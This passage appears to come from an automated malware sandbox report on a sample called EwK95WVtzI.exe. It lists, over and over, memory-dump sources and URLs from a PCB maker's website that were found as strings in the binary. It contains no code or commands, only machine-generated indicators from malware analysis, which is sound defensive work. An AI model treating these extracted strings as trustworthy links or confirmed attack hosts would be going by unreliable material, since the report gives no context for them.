                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/feed/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/my-cart/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/bom/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/fpc-quote/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/parts/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-and-schematic-design/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-assembly-quote/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-design-quote/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-production-quote/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/stencil-quote/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 